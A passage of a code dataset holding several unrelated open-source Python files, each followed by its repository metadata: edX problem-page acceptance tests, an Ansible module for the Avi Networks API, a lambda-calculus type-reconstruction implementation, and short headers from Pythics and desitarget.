self.assertFalse(problem_page.is_expected_status_visible('label.choicegroup_incorrect'))
self.assertTrue(problem_page.is_save_notification_visible())
class ProblemSubmitButtonMaxAttemptsTest(ProblemsTest):
"""
Tests that the Submit button disables after the number of max attempts is reached.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 2},
grader_type='Final Exam')
def test_max_attempts(self):
"""
Verifies that the Submit button disables when the max number of attempts is reached.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Submit first answer (correct)
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_submit_disabled())
problem_page.click_submit()
problem_page.wait_success_notification()
# Submit second and final answer (incorrect)
problem_page.click_choice("choice_1")
problem_page.click_submit()
problem_page.wait_incorrect_notification()
# Make sure that the Submit button disables.
problem_page.wait_for_submit_disabled()
class ProblemSubmitButtonPastDueTest(ProblemsTest):
"""
Tests that the Submit button is disabled if it is past the due date.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 2},
grader_type='Final Exam')
def get_sequential(self):
""" Subclasses can override this to add a sequential with metadata """
return XBlockFixtureDesc('sequential', 'Test Subsection', metadata={'due': "2016-10-01T00"})
def test_past_due(self):
"""
Verifies that the Submit button disables when the max number of attempts is reached.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Should have Submit button disabled on original rendering.
problem_page.wait_for_submit_disabled()
# Select a choice, and make sure that the Submit button remains disabled.
problem_page.click_choice("choice_2")
problem_page.wait_for_submit_disabled()
class ProblemExtendedHintTest(ProblemHintTest, EventsTestMixin):
"""
Test that extended hint features plumb through to the page html and tracking log.
"""
def get_problem(self):
"""
Problem with extended hint features.
"""
xml = dedent("""
<problem>
<p>question text</p>
<stringresponse answer="A">
<stringequalhint answer="B">hint</stringequalhint>
<textline size="20"/>
</stringresponse>
<demandhint>
<hint>demand-hint1</hint>
<hint>demand-hint2</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'TITLE', data=xml)
def test_check_hint(self):
"""
Test clicking Check shows the extended hint in the problem message.
"""
self.verify_check_hint(
'B',
u'Answer\nIncorrect: hint',
[
{
'event':
{
'hint_label': u'Incorrect:',
'trigger_type': 'single',
'student_answer': [u'B'],
'correctness': False,
'question_type': 'stringresponse',
'hints': [{'text': 'hint'}]
}
}
]
)
def test_demand_hint(self):
"""
Test clicking hint button shows the demand hint in its div.
"""
self.verify_demand_hints(
u'Hint (1 of 2): demand-hint1',
u'Hint (1 of 2): demand-hint1\nHint (2 of 2): demand-hint2',
[
{'event': {u'hint_index': 0, u'hint_len': 2, u'hint_text': u'demand-hint1'}},
{'event': {u'hint_index': 1, u'hint_len': 2, u'hint_text': u'demand-hint2'}}
]
)
class ProblemHintWithHtmlTest(ProblemHintTest, EventsTestMixin):
"""
Tests that hints containing html get rendered properly
"""
def get_problem(self):
"""
Problem with extended hint features.
"""
xml = dedent("""
<problem>
<p>question text</p>
<stringresponse answer="A">
<stringequalhint answer="C"><a href="#">aa bb</a> cc</stringequalhint>
<textline size="20"/>
</stringresponse>
<demandhint>
<hint>aa <a href="#">bb</a> cc</hint>
<hint><a href="#">dd ee</a> ff</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'PROBLEM HTML HINT TEST', data=xml)
def test_check_hint(self):
"""
Test clicking Check shows the extended hint in the problem message.
"""
self.verify_check_hint(
'C',
u'Answer\nIncorrect: aa bb cc',
[
{
'event':
{
'hint_label': u'Incorrect:',
'trigger_type': 'single',
'student_answer': [u'C'],
'correctness': False,
'question_type': 'stringresponse',
'hints': [{'text': '<a href="#">aa bb</a> cc'}]
}
}
]
)
def test_demand_hint(self):
"""
Test clicking hint button shows the demand hints in a notification area.
"""
self.verify_demand_hints(
u'Hint (1 of 2): aa bb cc',
u'Hint (1 of 2): aa bb cc\nHint (2 of 2): dd ee ff',
[
{'event': {u'hint_index': 0, u'hint_len': 2, u'hint_text': u'aa <a href="#">bb</a> cc'}},
{'event': {u'hint_index': 1, u'hint_len': 2, u'hint_text': u'<a href="#">dd ee</a> ff'}}
]
)
class ProblemWithMathjax(ProblemsTest):
"""
Tests the <MathJax> used in problem
"""
def get_problem(self):
"""
Create a problem with a <MathJax> in body and hint
"""
xml = dedent(r"""
<problem>
<p>Check mathjax has rendered [mathjax]E=mc^2[/mathjax]</p>
<multiplechoiceresponse>
<label>Answer this?</label>
<choicegroup type="MultipleChoice">
<choice correct="true">Choice1 <choicehint>Correct choice message</choicehint></choice>
<choice correct="false">Choice2<choicehint>Wrong choice message</choicehint></choice>
</choicegroup>
</multiplechoiceresponse>
<demandhint>
<hint>mathjax should work1 \(E=mc^2\) </hint>
<hint>mathjax should work2 [mathjax]E=mc^2[/mathjax]</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'MATHJAX TEST PROBLEM', data=xml)
def test_mathjax_in_hint(self):
"""
Test that MathJax have successfully rendered in problem hint
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, "MATHJAX TEST PROBLEM")
problem_page.verify_mathjax_rendered_in_problem()
# The hint button rotates through multiple hints
problem_page.click_hint()
self.assertEqual(
["<strong>Hint (1 of 2): </strong>mathjax should work1"],
problem_page.extract_hint_text_from_html
)
problem_page.verify_mathjax_rendered_in_hint()
# Rotate the hint and check the problem hint
problem_page.click_hint()
self.assertEqual(
[
"<strong>Hint (1 of 2): </strong>mathjax should work1",
"<strong>Hint (2 of 2): </strong>mathjax should work2"
],
problem_page.extract_hint_text_from_html
)
problem_page.verify_mathjax_rendered_in_hint()
class ProblemPartialCredit(ProblemsTest):
"""
Makes sure that the partial credit is appearing properly.
"""
def get_problem(self):
"""
Create a problem with partial credit.
"""
xml = dedent("""
<problem>
<p>The answer is 1. Partial credit for -1.</p>
<numericalresponse answer="1" partial_credit="list">
<label>How many miles away from Earth is the sun? Use scientific notation to answer.</label>
<formulaequationinput/>
<responseparam type="tolerance" default="0.01" />
<responseparam partial_answers="-1" />
</numericalresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'PARTIAL CREDIT TEST PROBLEM', data=xml)
def test_partial_credit(self):
"""
Test that we can see the partial credit value and feedback.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'PARTIAL CREDIT TEST PROBLEM')
problem_page.fill_answer_numerical('-1')
problem_page.click_submit()
problem_page.wait_for_status_icon()
self.assertTrue(problem_page.simpleprob_is_partially_correct())
class LogoutDuringAnswering(ProblemsTest):
"""
Tests for the scenario where a user is logged out (their session expires
or is revoked) just before they click "check" on a problem.
"""
def get_problem(self):
"""
Create a problem.
"""
xml = dedent("""
<problem>
<numericalresponse answer="1">
<label>The answer is 1</label>
<formulaequationinput/>
<responseparam type="tolerance" default="0.01" />
</numericalresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml)
def log_user_out(self):
"""
Log the user out by deleting their session cookie.
"""
self.browser.delete_cookie('sessionid')
def test_logout_after_click_redirect(self):
"""
1) User goes to a problem page.
2) User fills out an answer to the problem.
3) User is logged out because their session id is invalidated or removed.
4) User clicks "check", and sees a confirmation modal asking them to
re-authenticate, since they've just been logged out.
5) User clicks "ok".
6) User is redirected to the login page.
7) User logs in.
8) User is redirected back to the problem page they started out on.
9) User is able to submit an answer
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
self.log_user_out()
with problem_page.handle_alert(confirm=True):
problem_page.click_submit()
login_page = CombinedLoginAndRegisterPage(self.browser)
login_page.wait_for_page()
login_page.login(self.email, self.password)
problem_page.wait_for_page()
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
problem_page.click_submit()
self.assertTrue(problem_page.simpleprob_is_correct())
def test_logout_cancel_no_redirect(self):
"""
1) User goes to a problem page.
2) User fills out an answer to the problem.
3) User is logged out because their session id is invalidated or removed.
4) User clicks "check", and sees a confirmation modal asking them to
re-authenticate, since they've just been logged out.
5) User clicks "cancel".
6) User is not redirected to the login page.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
problem_page.fill_answer_numerical('1')
self.log_user_out()
with problem_page.handle_alert(confirm=False):
problem_page.click_submit()
problem_page.wait_for_page()
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
class ProblemQuestionDescriptionTest(ProblemsTest):
"""TestCase Class to verify question and description rendering."""
descriptions = [
"A vegetable is an edible part of a plant in tuber form.",
"A fruit is a fertilized ovary of a plant and contains seeds."
]
def get_problem(self):
"""
Create a problem with question and description.
"""
xml = dedent("""
<problem>
<choiceresponse>
<label>Eggplant is a _____?</label>
<description>{}</description>
<description>{}</description>
<checkboxgroup>
<choice correct="true">vegetable</choice>
<choice correct="false">fruit</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""".format(*self.descriptions))
return XBlockFixtureDesc('problem', 'Label with Description', data=xml)
def test_question_with_description(self):
"""
Scenario: Test that question and description are rendered as expected.
Given I am enrolled in a course.
When I visit a unit page with a CAPA question.
Then label and description should be rendered correctly.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'Label with Description')
self.assertEqual(problem_page.problem_question, 'Eggplant is a _____?')
self.assertEqual(problem_page.problem_question_descriptions, self.descriptions)
class CAPAProblemA11yBaseTestMixin(object):
"""Base TestCase Class to verify CAPA problem accessibility."""
def test_a11y(self):
"""
Verifies that there are no accessibility issues for a particular problem type
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Set the scope to the problem question
problem_page.a11y_audit.config.set_scope(
include=['.wrapper-problem-response']
)
# Run the accessibility audit.
problem_page.a11y_audit.check_for_accessibility_errors()
@attr('a11y')
class CAPAProblemChoiceA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify accessibility for checkboxes and multiplechoice CAPA problems."""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<choiceresponse>
<label>question 1 text here</label>
<description>description 2 text 1</description>
<description>description 2 text 2</description>
<checkboxgroup>
<choice correct="true">True</choice>
<choice correct="false">False</choice>
</checkboxgroup>
</choiceresponse>
<multiplechoiceresponse>
<label>question 2 text here</label>
<description>description 2 text 1</description>
<description>description 2 text 2</description>
<choicegroup type="MultipleChoice">
<choice correct="false">Alpha <choicehint>A hint</choicehint></choice>
<choice correct="true">Beta</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'Problem A11Y TEST', data=xml)
@attr('a11y')
class ProblemTextInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify TextInput problem accessibility."""
def get_problem(self):
"""
TextInput problem XML.
"""
xml = dedent("""
<problem>
<stringresponse answer="fight" type="ci">
<label>who wishes to _____ must first count the cost.</label>
<description>Appear weak when you are strong, and strong when you are weak.</description>
<description>In the midst of chaos, there is also opportunity.</description>
<textline size="40"/>
</stringresponse>
<stringresponse answer="force" type="ci">
<label>A leader leads by example not by _____.</label>
<description>The supreme art of war is to subdue the enemy without fighting.</description>
<description>Great results, can be achieved with small forces.</description>
<textline size="40"/>
</stringresponse>
</problem>""")
return XBlockFixtureDesc('problem', 'TEXTINPUT PROBLEM', data=xml)
@attr('a11y')
class CAPAProblemDropDownA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""TestCase Class to verify accessibility for dropdowns(optioninput) CAPA problems."""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<optionresponse>
<p>You can use this template as a guide to the simple editor markdown and OLX markup to use for
dropdown problems. Edit this component to replace this template with your own assessment.</p>
<label>Which of the following is a fruit</label>
<description>Choose wisely</description>
<optioninput>
<option correct="False">radish</option>
<option correct="True">appple</option>
<option correct="False">carrot</option>
</optioninput>
</optionresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'Problem A11Y TEST', data=xml)
@attr('a11y')
class ProblemNumericalInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""Tests NumericalInput accessibility."""
def get_problem(self):
"""NumericalInput problem XML."""
xml = dedent("""
<problem>
<numericalresponse answer="10*i">
<label>The square of what number is -100?</label>
<description>Use scientific notation to answer.</description>
<formulaequationinput/>
</numericalresponse>
</problem>""")
return XBlockFixtureDesc('problem', 'NUMERICALINPUT PROBLEM', data=xml)
@attr('a11y')
class ProblemMathExpressionInputA11yTest(CAPAProblemA11yBaseTestMixin, ProblemsTest):
"""Tests MathExpressionInput accessibility."""
def get_problem(self):
"""MathExpressionInput problem XML."""
xml = dedent(r"""
<problem>
<script type="loncapa/python">
derivative = "n*x^(n-1)"
</script>
<formularesponse type="ci" samples="x,n@1,2:3,4#10" answer="$derivative">
<label>Let \( x\) be a variable, and let \( n\) be an arbitrary constant. What is the derivative of \( x^n\)?</label>
<description>Enter the equation</description>
<responseparam type="tolerance" default="0.00001"/>
<formulaequationinput size="40"/>
</formularesponse>
</problem>""")
return XBlockFixtureDesc('problem', 'MATHEXPRESSIONINPUT PROBLEM', data=xml)
class ProblemMetaGradedTest(ProblemsTest):
"""
TestCase Class to verify that the graded variable is passed
"""
def get_problem(self):
"""
Problem structure
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml, grader_type='Final Exam')
def test_grader_type_displayed(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
self.assertEqual(problem_page.problem_progress_graded_value, "1 point possible (graded)")
class ProblemMetaUngradedTest(ProblemsTest):
"""
TestCase Class to verify that the ungraded variable is passed
"""
def get_problem(self):
"""
Problem structure
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml)
def test_grader_type_displayed(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TEST PROBLEM')
self.assertEqual(problem_page.problem_progress_graded_value, "1 point possible (ungraded)")
|
jzoldak/edx-platform
|
common/test/acceptance/tests/lms/test_lms_problems.py
|
Python
|
agpl-3.0
| 37,565
|
[
"VisIt"
] |
641cc740c096d2e233807a8053b60560d33cde80f7b3fa90caa9c7a06a01bd9e
|
#!/usr/bin/python
"""
# Created on Aug 12, 2016
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com) GitHub ID: grastogi23
#
# module_check: not supported
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
"""
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_api_session
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Avi API Module
description:
- This module can be used for calling any resources defined in Avi REST API. U(https://avinetworks.com/)
- This module is useful for invoking HTTP Patch methods and accessing resources that do not have an REST object associated with them.
version_added: 2.3
requirements: [ avisdk ]
options:
http_method:
description:
- Allowed HTTP methods for RESTful services and are supported by Avi Controller.
choices: ["get", "put", "post", "patch", "delete"]
required: true
data:
description:
- HTTP body in YAML or JSON format.
params:
description:
- Query parameters passed to the HTTP API.
path:
description:
- 'Path for Avi API resource. For example, C(path: virtualservice) will translate to C(api/virtualserivce).'
timeout:
description:
- Timeout (in seconds) for Avi API calls.
default: 60
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Get Pool Information using avi_api_session
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: get
path: pool
params:
name: "{{ pool_name }}"
api_version: 16.4
register: pool_results
- name: Patch Pool with list of servers
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: patch
path: "{{ pool_path }}"
api_version: 16.4
data:
add:
servers:
- ip:
addr: 10.10.10.10
type: V4
- ip:
addr: 20.20.20.20
type: V4
register: updated_pool
- name: Fetch Pool metrics bandwidth and connections rate
avi_api_session:
controller: "{{ controller }}"
username: "{{ username }}"
password: "{{ password }}"
http_method: get
path: analytics/metrics/pool
api_version: 16.4
params:
name: "{{ pool_name }}"
metric_id: l4_server.avg_bandwidth,l4_server.avg_complete_conns
step: 300
limit: 10
register: pool_metrics
'''
RETURN = '''
obj:
description: Avi REST resource
returned: success, changed
type: dict
'''
import json
import time
from ansible.module_utils.basic import AnsibleModule
from copy import deepcopy
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, ansible_return, avi_obj_cmp,
cleanup_absent_fields, HAS_AVI)
from ansible.module_utils.network.avi.avi_api import (
ApiSession, AviCredentials)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
http_method=dict(required=True,
choices=['get', 'put', 'post', 'patch',
'delete']),
path=dict(type='str', required=True),
params=dict(type='dict'),
data=dict(type='jsonarg'),
timeout=dict(type='int', default=60)
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(argument_spec=argument_specs)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) or requests is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
api_creds = AviCredentials()
api_creds.update_from_ansible_module(module)
api = ApiSession.get_session(
api_creds.controller, api_creds.username, password=api_creds.password,
timeout=api_creds.timeout, tenant=api_creds.tenant,
tenant_uuid=api_creds.tenant_uuid, token=api_creds.token,
port=api_creds.port)
tenant_uuid = api_creds.tenant_uuid
tenant = api_creds.tenant
timeout = int(module.params.get('timeout'))
# path is a required argument
path = module.params.get('path', '')
params = module.params.get('params', None)
data = module.params.get('data', None)
# Get the api_version from module.
api_version = api_creds.api_version
if data is not None:
data = json.loads(data)
method = module.params['http_method']
existing_obj = None
changed = method != 'get'
gparams = deepcopy(params) if params else {}
gparams.update({'include_refs': '', 'include_name': ''})
# API methods not allowed
api_get_not_allowed = ["cluster", "gslbsiteops"]
api_post_not_allowed = ["alert", "fileservice"]
api_put_not_allowed = ["backup"]
if method == 'post' and not any(path.startswith(uri) for uri in api_post_not_allowed):
# TODO: Above condition should be updated after AV-38981 is fixed
# need to check if object already exists. In that case
# change the method to be put
try:
using_collection = False
if not any(path.startswith(uri) for uri in api_get_not_allowed):
if 'name' in data:
gparams['name'] = data['name']
using_collection = True
if not any(path.startswith(uri) for uri in api_get_not_allowed):
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
existing_obj = rsp.json()
if using_collection:
existing_obj = existing_obj['results'][0]
except (IndexError, KeyError):
# object is not found
pass
else:
if not any(path.startswith(uri) for uri in api_get_not_allowed):
# object is present
method = 'put'
path += '/' + existing_obj['uuid']
if method == 'put' and not any(path.startswith(uri) for uri in api_put_not_allowed):
# put can happen with when full path is specified or it is put + post
if existing_obj is None:
using_collection = False
if ((len(path.split('/')) == 1) and ('name' in data) and
(not any(path.startswith(uri) for uri in api_get_not_allowed))):
gparams['name'] = data['name']
using_collection = True
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
rsp_data = rsp.json()
if using_collection:
if rsp_data['results']:
existing_obj = rsp_data['results'][0]
path += '/' + existing_obj['uuid']
else:
method = 'post'
else:
if rsp.status_code == 404:
method = 'post'
else:
existing_obj = rsp_data
if existing_obj:
changed = not avi_obj_cmp(data, existing_obj)
cleanup_absent_fields(data)
if method == 'patch':
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
existing_obj = rsp.json()
if (method == 'put' and changed) or (method != 'put'):
fn = getattr(api, method)
rsp = fn(path, tenant=tenant, tenant_uuid=tenant, timeout=timeout,
params=params, data=data, api_version=api_version)
else:
rsp = None
if method == 'delete' and rsp.status_code == 404:
changed = False
rsp.status_code = 200
if method == 'patch' and existing_obj and rsp.status_code < 299:
# Ideally the comparison should happen with the return values
# from the patch API call. However, currently Avi API are
# returning different hostname when GET is used vs Patch.
# tracked as AV-12561
if path.startswith('pool'):
time.sleep(1)
gparams = deepcopy(params) if params else {}
gparams.update({'include_refs': '', 'include_name': ''})
rsp = api.get(path, tenant=tenant, tenant_uuid=tenant_uuid,
params=gparams, api_version=api_version)
new_obj = rsp.json()
changed = not avi_obj_cmp(new_obj, existing_obj)
if rsp is None:
return module.exit_json(changed=changed, obj=existing_obj)
return ansible_return(module, rsp, changed, req=data)
if __name__ == '__main__':
main()
|
thaim/ansible
|
lib/ansible/modules/network/avi/avi_api_session.py
|
Python
|
mit
| 9,021
|
[
"VisIt"
] |
79f3cb7f5577b5072180d7df821f6073abbf9bf990093eade8a3b838489c4c3e
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 - 2019 Brian R. D'Urso
#
# This file is part of Python Instrument Control System, also known as Pythics.
#
# Pythics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pythics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pythics. If not, see <http://www.gnu.org/licenses/>.
#
__all__ = ['lib']
|
dursobr/Pythics
|
pythics/__init__.py
|
Python
|
gpl-3.0
| 802
|
[
"Brian"
] |
cebca798a813b39dbb1096e1f6aeb998f64106a0f74b588e1ed13e8b6eff5edd
|
from functools import reduce
from syntax import *
from collections import namedtuple
class NoRuleApplies(RuntimeError):
pass
# ------------------------ EVALUATION ------------------------
def isnumericval(term):
t_term = type(term)
if t_term is TmZero:
return True
elif t_term is TmSucc:
return isnumericval(term.term)
return False
def isval(term):
t_term = type(term)
if t_term is TmTrue:
return True
elif t_term is TmFalse:
return True
elif isnumericval(term):
return True
elif t_term is TmAbs:
return True
return False
class Evaluate(Visitor):
def visit_TmApp(term, ctx):
if isval(term.left) and isval(term.right):
return termSubstTop(term.right, term.left.term)
elif isval(term.left):
right = evaluate1(term.right, ctx)
return term._replace(right=right)
else:
left = evaluate1(term.left, ctx)
return term._replace(left=left)
def visit_TmIf(term, ctx):
t_cond = type(term.term_condition)
if t_cond is TmTrue:
return term.term_then
elif t_cond is TmFalse:
return term.term_else
t = evaluate1(term.term_condition, ctx)
return term._replace(term_condition=t)
def visit_TmSucc(term, ctx):
t = evaluate1(term.term, ctx)
return term._replace(term=t)
def visit_TmPred(term, ctx):
t_term = type(term.term)
if t_term is TmZero:
return TmZero(None)
elif t_term is TmSucc and isnumericval(term.term):
return term.term
t = evaluate1(term.term, ctx)
return TmPred(term.info, t)
def visit_TmIsZero(term, ctx):
t_term = type(term.term)
if t_term is TmZero:
return TmTrue(None)
elif t_term is TmSucc and isnumericval(term.term):
return TmFalse(None)
t = evaluate1(term.term, ctx)
return TmIsZero(term.info, t)
def visit_ANY(term, ctx):
raise NoRuleApplies
evaluate1 = Evaluate.visit
def evaluate(ctx, term):
try:
return evaluate(ctx, evaluate1(term, ctx))
except NoRuleApplies:
return term
# ------------------------ TYPING ------------------------
combineconstr = list.extend
def uvargen():
n = 0
while True:
yield "?X%s" % n
n += 1
class Reconstruction(Visitor):
def visit_TmVar(term, ctx, nextuvar):
tyT = getTypeFromContext(ctx, term.index)
return (tyT, [])
def visit_TmAbs(term, ctx, nextuvar):
"lambda <name>:<type>. <term>"
typeLeft = term.type
addbinding(ctx, term.name, VarBind(typeLeft))
(typeRight, contsr) = recon(term.term, ctx, nextuvar)
ctx.pop()
return (TyArr(typeLeft, typeRight), contsr)
def visit_TmApp(term, ctx, nextuvar):
"""
(t1 t2) with t1: T1, t2: T2
return: type X and constraint T1 = T2 -> X
see 22.3 Constraint-Based Typing
"""
(typeLeft, constrLeft) = recon(term.left, ctx, nextuvar)
(typeRight, constrRight) = recon(term.right, ctx, nextuvar)
tyX = nextuvar()
# typeLeft should be is 'arrow' from typeRight to X
newconstr = [(typeLeft, TyArr(typeRight, TyId(tyX)))]
constr = newconstr + constrLeft + constrRight
return (TyId(tyX), constr)
def visit_TmZero(term, ctx, nextuvar):
return (TyNat(), [])
def visit_TmSucc(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
return (TyNat(), [(tyT, TyNat())] + constr)
def visit_TmPred(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
return (TyNat(), [(tyT, TyNat())] + constr)
def visit_TmIsZero(term, ctx, nextuvar):
(tyT, constr) = recon(term.term, ctx, nextuvar)
return (TyNat(), [(tyT, TyNat())] + constr)
def visit_TmTrue(term, ctx, nextuvar):
return (TyBool(), [])
def visit_TmFalse(term, ctx, nextuvar):
return (TyBool(), [])
def visit_TmIf(term, ctx, nextuvar):
(tyT1, constr1) = recon(term.term_condition, ctx, nextuvar)
(tyT2, constr2) = recon(term.term_then, ctx, nextuvar)
(tyT3, constr3) = recon(term.term_else, ctx, nextuvar)
newconstr = [(tyT1,TyBool()), (tyT2,tyT3)]
constr = newconstr + constr1 + constr2 + constr3
return (tyT3, constr)
recon = Reconstruction.visit
class SubstituteInTy(Visitor):
def visit_TyArr(term, tyX, tyT):
return TyArr(
substinty(term.left, tyX, tyT),
substinty(term.right, tyX, tyT))
def visit_TyNat(term, tyX, tyT):
return term
def visit_TyBool(term, tyX, tyT):
return term
def visit_TyId(term, tyX, tyT):
if term.name == tyX:
return tyT
return term
substinty = SubstituteInTy.visit
def applysubst(constr, tyT):
tyS = tyT
for (tyC1, tyC2) in reversed(constr):
tyX = tyC1.name
tyS = substinty(tyS, tyX, tyC2)
return tyS
def substinconstr(tyT, tyX, constr):
return list(map(
lambda tyS: (
substinty(tyS[0], tyX, tyT),
substinty(tyS[1], tyX, tyT)),
constr))
class OccursIn(Visitor):
def visit_TyArr(term, tyX):
return (
occursin(term.left, tyX)
or occursin(term.right, tyX))
def visit_TyNat(term, tyX):
return False
def visit_TyBool(term, tyX):
return False
def visit_TyId(term, tyX):
return term.name == tyX
occursin = OccursIn.visit
def unify(ctx, constr_in):
if not constr_in:
return constr_in
constr = list(constr_in)
(tyS, tyT) = constr[0]
rest = constr[1:]
t_tyS = type(tyS)
t_tyT = type(tyT)
if t_tyT is TyId:
tyX = tyT.name
if tyS == tyT:
return unify(ctx, rest)
elif occursin(tyS, tyX):
raise RuntimeError("Circular constraints")
else:
upd = unify(ctx, substinconstr(tyS, tyX, rest))
upd.append((TyId(tyX),tyS))
return upd
elif t_tyS is TyId:
tyX = tyS.name
if tyT == tyS:
return unify(ctx, rest)
elif occursin(tyT, tyX):
raise RuntimeError("Circular constraints")
else:
upd = unify(ctx, substinconstr(tyT, tyX, rest))
upd.append((TyId(tyX),tyT))
return upd
elif t_tyS is TyNat and t_tyT is TyNat:
return unify(ctx, rest)
elif t_tyS is TyBool and t_tyT is TyBool:
return unify(ctx, rest)
elif t_tyS is TyArr and t_tyT is TyArr:
upd = [(tyS.left, tyT.left), (tyS.right, tyT.right)]
upd.extend(rest)
return unify(ctx, upd)
raise RuntimeError("Unsolvable constraints")
|
habibutsu/tapl-py
|
recon/core.py
|
Python
|
mit
| 6,891
|
[
"VisIt"
] |
c46e7ac60bc4b20aa4197186291b6d5a52df2f6bd5a423b860c319df7853797f
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""
desitarget.randoms
==================
Monte Carlo Legacy Surveys imaging at the pixel level to model the imaging footprint
"""
import os
import numpy as np
import astropy.io.fits as fits
from astropy.wcs import WCS
from time import time
import healpy as hp
import fitsio
import photutils
from glob import glob, iglob
from desitarget.gaiamatch import get_gaia_dir
from desitarget.geomask import bundle_bricks, box_area
from desitarget.geomask import get_imaging_maskbits, get_default_maskbits
from desitarget.targets import resolve, main_cmx_or_sv, finalize
from desitarget.skyfibers import get_brick_info
from desitarget.io import read_targets_in_box, target_columns_from_header
from desitarget.targetmask import desi_mask as dMx
# ADM the parallelization script.
